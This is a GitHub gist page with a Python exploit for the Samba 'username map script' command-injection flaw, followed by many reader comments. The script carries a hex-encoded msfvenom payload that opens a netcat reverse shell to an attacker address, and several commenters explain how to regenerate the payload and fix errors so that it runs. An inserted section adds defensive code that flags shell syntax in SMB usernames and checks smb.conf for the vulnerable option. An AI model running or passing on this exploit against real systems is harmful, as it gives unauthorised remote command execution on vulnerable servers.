@joenorton8014
Created August 19, 2017 12:35
#!/usr/bin/python
from smb.SMBConnection import SMBConnection
import random, string
from smb import smb_structs
smb_structs.SUPPORT_SMB2 = False
import sys
# Just a python version of a very simple Samba exploit.
# It doesn't have to be pretty because the shellcode is executed
# in the username field.
# Based off this Metasploit module - https://www.exploit-db.com/exploits/16320/
# Configured SMB connection options with info from here:
# https://pythonhosted.org/pysmb/api/smb_SMBConnection.html
# Use the commandline argument as the target:
if len(sys.argv) < 2:
    print "\nUsage: " + sys.argv[0] + " <HOST>\n"
    sys.exit()
# Shellcode:
# msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.35 LPORT=9999 -f python
buf = ""
buf += "\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x6b"
buf += "\x62\x67\x61\x66\x3b\x20\x6e\x63\x20\x31\x30\x2e\x30"
buf += "\x2e\x30\x2e\x33\x35\x20\x39\x39\x39\x39\x20\x30\x3c"
buf += "\x2f\x74\x6d\x70\x2f\x6b\x62\x67\x61\x66\x20\x7c\x20"
buf += "\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74\x6d\x70"
buf += "\x2f\x6b\x62\x67\x61\x66\x20\x32\x3e\x26\x31\x3b\x20"
buf += "\x72\x6d\x20\x2f\x74\x6d\x70\x2f\x6b\x62\x67\x61\x66"
buf += "\x20"
username = "/=`nohup " + buf + "`"
password = ""
conn = SMBConnection(username, password, "SOMEBODYHACKINGYOU" , "METASPLOITABLE", use_ntlm_v2 = False)
assert conn.connect(sys.argv[1], 445)
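The gist works because affected Samba 3.0.x builds hand the SMB username, unescaped, to /bin/sh through the "username map script" option. The following is an added defender-side example, not part of the gist: it flags SMB usernames that carry shell syntax (while allowing the trailing "$" of machine accounts) over constructed sample log lines, and checks an smb.conf text for the option. The log format, hostnames and file paths are constructed for the example.

```python
import re

# Constructed sample log lines (not from the gist). The first mimics the
# username shape the gist sends ("/=`...`"); the rest are benign, including a
# machine account whose trailing "$" is legitimate.
SAMPLE_LOG = [
    'smbd: session setup from 10.0.0.35 user="/=`nohup id`" result=fail',
    'smbd: session setup from 10.0.0.12 user="alice" result=ok',
    'smbd: session setup from 10.0.0.13 user="svc$(id)" result=fail',
    'smbd: session setup from 10.0.0.14 user="WORKSTATION$" result=ok',
]

# Shell metacharacters that have no place in an SMB account name. A lone
# trailing "$" is allowed (machine accounts), but "$(" and "${" are not.
SHELL_META = re.compile(r"[`;|&<>\n]|\$[({]")
USER_RE = re.compile(r'from (?P<src>\S+) user="(?P<user>[^"]*)"')


def is_shell_injection_username(user: str) -> bool:
    """True when an SMB username carries shell syntax (the gist's vector)."""
    return SHELL_META.search(user) is not None


def scan_log(lines):
    """Return (source, username) pairs whose username looks like injection."""
    hits = []
    for line in lines:
        m = USER_RE.search(line)
        if m and is_shell_injection_username(m.group("user")):
            hits.append((m.group("src"), m.group("user")))
    return hits


def usermap_script_enabled(smb_conf: str) -> bool:
    """True if smb.conf sets a non-empty 'username map script'."""
    for raw in smb_conf.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;" or "=" not in line:
            continue  # blank, comment, or section header
        key, value = (p.strip() for p in line.split("=", 1))
        if key.lower() == "username map script" and value:
            return True
    return False


if __name__ == "__main__":
    for src, user in scan_log(SAMPLE_LOG):
        print("suspicious SMB username from %s: %r" % (src, user))
    conf = "[global]\n  username map script = /etc/samba/map.sh\n"  # constructed
    print("username map script set:", usermap_script_enabled(conf))
```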
@ar0dd

ar0dd commented Mar 3, 2019

Works like a charm. Thanks.

@rehamun

rehamun commented Sep 4, 2019

Could you please clarify how the code is going to recognize the RHOST IP or the URL?

@jeffinm

jeffinm commented Feb 26, 2020

Hi,
I am getting this error while running this code. Any idea why?

python samba-usermap-exploit.py

Traceback (most recent call last):
File "samba-usermap-exploit.py", line 4, in
from smb.SMBConnection import SMBConnection
ImportError: No module named smb.SMBConnection

@Anass-bekar

Download mysmb.py

@toddjones1984

I downloaded impacket and mysmb.py but I'm still getting errors; any help would be appreciated.

Traceback (most recent call last):
File "3.0.20.py", line 3, in
from smb.SMBConnection import SMBConnection
File "/opt/smb/impacket/impacket/smb.py", line 49, in
from pyasn1.type.univ import noValue
ImportError: No module named pyasn1.type.univ

@edenbomb

According to http://http.kali.org/kali/pool/main/p/pysmb/, when we try to install smb for python2 it will give an error due to file not found.
So I would like to suggest this edit:
Old :
print "\nUsage: " + sys.argv[0] + " \n"
New :
print ("\nUsage: " + sys.argv[0] + " \n")

and using python3 instead.

Remark :
Command install ==> sudo sudo apt-get install -y python3-smb

@CybertSys

There's an encoding issue. I know what needs to happen but I'm unsure of the syntax.

username = "/=nohup " + buf + ""
TypeError: can only concatenate str (not "bytes") to str

@ghost-ng

A tip: stick with python2, pip install pysmb still works... this exploit is the simplest they come.

@Anonimo501

Anonimo501 commented May 30, 2021

Hi.

After several errors I ran pip install pysmb and then fixed the print " error by adding the parentheses (""); after doing all this I was able to run the exploit, but then a new problem came up, which is the following:

python samba-usermap-exploit.py 192.168.1.70
Traceback (most recent call last):
File "/home/botache/samba-usermap-exploit.py", line 42, in
assert conn.connect(sys.argv[1], 445)
File "/usr/local/lib/python3.9/dist-packages/smb/SMBConnection.py", line 127, in connect
self._pollForNetBIOSPacket(timeout)
File "/usr/local/lib/python3.9/dist-packages/smb/SMBConnection.py", line 600, in _pollForNetBIOSPacket
raise SMBTimeout
smb.base.SMBTimeout

If anyone knows the solution to this, I'd appreciate it.
Regards and thanks.

OK, coming back to this, I realize you have to create the payload yourself with the command: msfvenom -p cmd/unix/reverse_netcat LHOST=ipatacante LPORT=4444 -f python

But after generating it and trying to send the attack again, I get the following:
Traceback (most recent call last):
File "/home/botache/samba-usermap-exploit.py", line 38, in
username = "/=nohup " + buf + ""
TypeError: can only concatenate str (not "bytes") to str

I still haven't solved this or found a solution for it; if anyone can help, thanks a lot.

@Mohammed-Aljohani

to run this script successfully, follow the below steps:
1- sudo pip install pysmb
2- Add parentheses in print function because we will use python3, so will be like this: print ("\nUsage: " + sys.argv[0] + " \n")
3- since str can't be concatenated with bytes, we will decode our bytes on line 38 and then concatenate, so it will be like this: username = "/=nohup " + buf.decode + ""

@cybertuxh4xor

Help with this issue please.

└─$ python3 ./samba-usermap-exploit.py 10.10.10.3 1 ⨯
Traceback (most recent call last):
File "/home/kali/Downloads/19aaa00e0088738fc429cff2669b9851-6e1ae37e0061be103fd733b16266d26379a7f4ba/./samba-usermap-exploit.py", line 42, in
assert conn.connect(sys.argv[1], 445)
AssertionError

@WorksWellWithOthers

WorksWellWithOthers commented Mar 26, 2022

Could you please clarify how the code is going to recognize the RHOST IP or the URL?

The command-line argument passed when calling this script sets the RHOST IP:
assert conn.connect(sys.argv[1], 445)

Running this on the command line generates a new shellcode for you to replace the variable buf with. The LHOST is declared there.
msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.0.35 LPORT=9999 -f python

@WorksWellWithOthers

Help with this issue please.

└─$ python3 ./samba-usermap-exploit.py 10.10.10.3 1 ⨯
Traceback (most recent call last):
File "/home/kali/Downloads/19aaa00e0088738fc429cff2669b9851-6e1ae37e0061be103fd733b16266d26379a7f4ba/./samba-usermap-exploit.py", line 42, in
assert conn.connect(sys.argv[1], 445)
AssertionError

Do you have a listener running at port 445?

Try running a listener before attempting this script:
nc -nvlp 445

@polaris430

Folks using msf6: make sure lhosts = tun0 interface ip address, else it won't work.

@anonedez

Hello dear friends, please help me :)

python SambaExploit.py 10.0.2.12
Traceback (most recent call last):
File "/root/Desktop/SambaExploit.py", line 39, in
assert conn.connect(sys.argv[1], 445)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/local/lib/python3.11/dist-packages/smb/SMBConnection.py", line 120, in connect
self.sock = socket.create_connection(( ip, port ), timeout = timeout)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/socket.py", line 851, in create_connection
raise exceptions[0]
File "/usr/lib/python3.11/socket.py", line 836, in create_connection
sock.connect(sa)
ConnectionRefusedError: [Errno 111] Connection refused

What should I do?

@anonedez

Folks using msf6: make sure lhosts = tun0 interface ip address, else it won't work.

Okay bro, what can I do?

@ghost-ng

That error just says you can't connect to the target: either the target is offline or it is not responding on that port.

@anonedez

to run this script successfully, follow the below steps:
1- sudo pip install pysmb
2- Add parentheses in print function because we will use python3, so will be like this: print ("\nUsage: " + sys.argv[0] + " \n")
3- since can't concatenate str (not "bytes") to str, we will decode our byte in line 38 then concatenate , so will be like this: username = "/=nohup " + buf.decode + ""

Help please.

@ghost-ng

@anonedez

Like I said above, use python2 to avoid making these modifications.

How can I use python 2? I am new to cyber security. This is why I don't understand much.

@anonedez

anonedez commented Feb 10, 2024 via email
